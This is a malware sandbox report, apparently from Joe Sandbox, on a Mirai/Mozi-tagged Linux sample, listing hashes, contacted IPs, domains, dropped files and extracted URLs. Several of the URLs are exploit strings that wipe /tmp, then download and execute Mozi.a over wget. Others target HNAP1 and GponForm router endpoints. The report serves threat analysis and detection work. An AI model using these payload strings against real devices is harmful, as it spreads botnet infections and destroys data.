ZFvtIZszMd

Status: finished

Submission Time: 2022-01-21 04:08:12 +01:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
557423
API (Web) ID:
924938
Analysis Started:

2022-01-21 04:31:53 +01:00
Analysis Finished:

2022-01-21 04:40:07 +01:00
MD5:
ddba92dcf5c5fd7b791f6278a3e20fb8
SHA1:
635075a22cd4e3ade3583d4e9787a09b06e50b76
SHA256:
bc08d8a3541834634fa5fd606805ee6e24cd07575af27bbcbb8ad02247cccd38
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

Third Party Analysis Engines

Open Full Report

malicious

Score: 40/60

Open Full Report

malicious

Score: 17/35

malicious

Score: 26/43

IPs

IP	Country	Detection
13.238.47.38	United States
17.54.72.65	United States
142.114.10.196	Canada
Click to see the 97 hidden entries
119.113.120.170	China
184.126.156.228	United States
171.112.185.78	China
132.17.157.215	United States
65.235.104.115	United States
46.146.25.135	Russian Federation
161.52.123.70	Sweden
46.230.96.252	Saudi Arabia
79.22.69.125	Italy
181.211.64.157	Ecuador
194.190.206.103	Russian Federation
197.23.125.151	Tunisia
222.92.234.116	China
193.1.101.106	Ireland
22.14.164.25	United States
221.88.134.158	Japan
88.248.201.54	Turkey
112.193.89.217	China
83.34.29.8	Spain
117.196.55.244	India
64.208.187.179	United States
14.12.94.24	Japan
106.25.199.66	China
221.104.48.126	Japan
191.71.196.147	Colombia
140.96.96.109	Taiwan; Republic of China (ROC)
188.115.214.179	Armenia
91.125.84.41	United Kingdom
146.51.174.99	Japan
92.189.120.221	France
143.95.128.28	United States
155.108.107.202	United States
107.234.200.0	United States
30.223.214.12	United States
70.107.151.243	United States
39.179.39.95	China
189.212.242.229	Mexico
166.57.155.129	United States
219.253.38.248	Korea Republic of
67.165.181.82	United States
4.67.109.111	United States
16.112.202.2	United States
207.249.235.141	Mexico
38.197.168.247	United States
142.178.73.14	Canada
154.249.187.10	Algeria
218.50.238.88	Korea Republic of
175.239.97.66	Korea Republic of
97.54.207.224	United States
142.81.176.61	Canada
195.61.161.173	European Union
89.94.62.166	France
185.18.207.206	Israel
84.71.242.96	United Kingdom
83.25.227.199	Poland
7.193.28.254	United States
204.45.126.208	United States
157.207.132.147	United States
194.218.177.186	Sweden
91.212.82.117	unknown
26.56.43.205	United States
3.65.136.88	United States
200.55.162.24	Cuba
82.40.120.62	United Kingdom
105.214.241.254	South Africa
213.243.254.10	Italy
88.225.4.102	Turkey
2.51.74.234	United Arab Emirates
86.199.245.5	France
118.185.13.53	India
177.73.251.61	Brazil
135.242.188.8	United States
134.109.132.112	Germany
130.175.68.192	United States
37.148.152.25	Germany
192.144.81.128	Bangladesh
186.134.33.191	Argentina
181.183.102.130	Venezuela
76.189.201.245	United States
17.209.94.162	United States
186.127.250.135	Argentina
51.67.184.58	United Kingdom
40.111.74.139	United States
166.178.154.91	United States
20.57.184.167	United States
167.13.252.185	United States
17.195.182.102	United States
140.92.187.172	Taiwan; Republic of China (ROC)
88.60.130.88	Italy
160.108.162.20	United States
121.93.165.47	Japan
129.19.234.207	United States
133.116.187.207	Japan
208.140.180.142	United States
207.76.206.157	United States
181.33.35.31	Colombia
94.140.191.157	Belgium

Domains

Name	IP	Detection
dht.transmissionbt.com	87.98.162.88
bttracker.acc.umu.se	130.239.18.158
router.bittorrent.com	67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com	82.221.103.244
bttracker.debian.org	0.0.0.0

URLs

Name	Detection
http://2.178.219.63:80/HNAP1/
http://54.84.181.34:80/HNAP1/
http://%s:%d/bin.sh
Click to see the 57 hidden entries
http://52.73.33.104:80/HNAP1/
http://52.4.18.169:80/HNAP1/
http://52.232.110.39:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.208.233.170:80/HNAP1/
http://23.208.34.61:80/HNAP1/
http://45.8.220.39:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://187.157.44.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:5555/UD/act?1
http://184.25.176.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://161.71.2.41:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://64.34.159.178:80/HNAP1/
http://104.101.170.129:80/HNAP1/
http://3.20.201.243:80/HNAP1/
http://207.154.230.111:80/HNAP1/
http://45.144.3.201:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://190.166.198.45:80/HNAP1/
http://%s:%d/bin.sh;chmod
http://83.142.198.185:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://185.199.110.112:80/HNAP1/
http://200.123.205.169:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://52.72.158.238:80/HNAP1/
http://23.12.89.25:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
http://www.alsa-project.org
http://127.0.0.1sendcmd
https://ubuntu.com/blog/microk8s-memory-optimisation
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://ipinfo.io/ip
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://%s:%d/Mozi.a;chmod
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://www.alsa-project.org.
http://HTTP/1.1
http://pastebin.ca)
http://schemas.xmlsoap.org/soap/envelope//
http://34.98.66.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://46.254.184.147:80/HNAP1/
http://www.alsa-project.org/cardinfo-db/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://%s:%d/Mozi.m
http://www.alsa-project.org/alsa-info.sh
http://%s:%d/Mozi.m;
http://%s:%d/Mozi.a;sh$
http://www.pastebin.ca.
http://www.pastebin.ca/upload.php
http://168.176.61.231:80/HNAP1/
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://210.117.103.177:49152/soap.cgi?service=WANIPConn1
http://schemas.xmlsoap.org/soap/envelope/
http://127.0.0.1:80/GponForm/diag_Form?images/
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/encoding/
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://127.0.0.1
http://127.0.0.1:7574/UD/act?1

Dropped files

Name	File Type	Hashes
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
Click to see the 97 hidden entries
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z99-cloudinit-warnings.sh	ASCII text	#
/etc/profile.d/Z99-cloud-locale-test.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/profile.d/01-locale-fix.sh	ASCII text	#
/etc/init.d/keyboard-setup.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/console-setup.sh	ASCII text	#
/usr/bin/rescan-scsi-bus.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped	#
/etc/profile.d/gawk.sh	ASCII text	#
/etc/profile.d/im-config_wayland.sh	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/xdg_dirs_desktop_session.sh	ASCII text	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/usr/bin/gettext.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/python3-colorama/examples/demo.sh	ASCII text	#
/usr/share/doc/python3-serial/examples/port_publisher.sh	ASCII text	#
/usr/share/doc/sg3-utils/examples/sg_persist_tst.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/usr/share/doc/git/contrib/vscode/init.sh	ASCII text	#
/usr/share/doc/git/contrib/update-unicode/update_unicode.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/features/list-arch.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm64/boot/install.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscalltbl.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallnr.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallhdr.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm/boot/install.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm/boot/deflate_xip_data.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/sound/cards/multisound.sh	C source, ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/s390/config3270.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/features/scripts/features-refresh.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/arm64/kasan-offsets.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/udev-install.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/status.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/autoload.sh	ASCII text	#
/usr/share/vim/vim81/macros/less.sh	ASCII text	#
/usr/share/session-migration/scripts/01-usd-migration-monitors-xml.sh	ASCII text	#
/usr/share/os-prober/common.sh	ASCII text	#
/usr/share/lightdm/guest-session/setup.sh	ASCII text	#
/usr/share/hplip/hplip_clean.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	ASCII text, with CR, LF line terminators	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/usr/share/PackageKit/helpers/test_spawn/search-name.sh	ASCII text	#
/tmp/.config	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/etc/gdm3/config-error-dialog.sh	ASCII text	#
/etc/console-setup/cached_setup_terminal.sh	ASCII text	#
/etc/console-setup/cached_setup_keyboard.sh	ASCII text	#
/etc/console-setup/cached_setup_font.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/git/contrib/diff-highlight/t/t9400-diff-highlight.sh	ASCII text	#
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh	ASCII text	#
/usr/share/doc/git/contrib/coverage-diff.sh	ASCII text	#
/usr/share/doc/gdb/contrib/words.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/boot/grub/i386-pc/modinfo.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#
/usr/share/doc/bubblewrap/examples/flatpak-run.sh	ASCII text	#
/usr/share/doc/bubblewrap/examples/bubblewrap-shell.sh	ASCII text	#
/usr/share/doc/acpid/examples/powerbtn.sh	ASCII text	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#

ZFvtIZszMd

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

ZFvtIZszMd Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

ZFvtIZszMd